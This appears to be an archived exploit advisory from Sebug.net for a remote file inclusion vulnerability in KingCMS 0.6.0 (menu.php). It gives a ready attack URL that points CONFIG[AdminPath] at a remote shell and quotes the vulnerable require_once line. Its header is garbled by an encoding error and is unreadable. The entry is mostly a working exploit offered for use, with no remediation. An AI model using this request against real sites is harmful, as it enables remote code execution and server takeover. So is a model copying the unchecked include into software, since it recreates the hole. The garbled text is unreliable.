kingcms 0.6.0 (menu.php) Remote File Inclusion Vulnerability

ʱ: 2009-09-01 (GMT+0800)

Է:

@Sebug.net   dis
վṩ()ܴй,ȫоѧ֮,Ը!1.-------------------------------------------------------------------------------------2.Kingcms v0.6.0 [menu.php] Remote File Inclusion Vulnerability3.-------------------------------------------------------------------------------------4. 5.Author: CoBRa_216. 7.Mail: uyku_cu[at]windowslive[dot]com8. 9.Script Download: http://sourceforge.net/projects/kingcms/10. 11.-------------------------------------------------------------------------------------12. 13.EXPLO?T:14. 15.http://localhost/[PATH]/include/engine/content/elements/menu.php? CONFIG[AdminPath] =[SHELL]16. 17.-------------------------------------------------------------------------------------18.BUG:19. 20.<?21.require_once($CONFIG['AdminPath'] . "/include/engine/folder.php"); 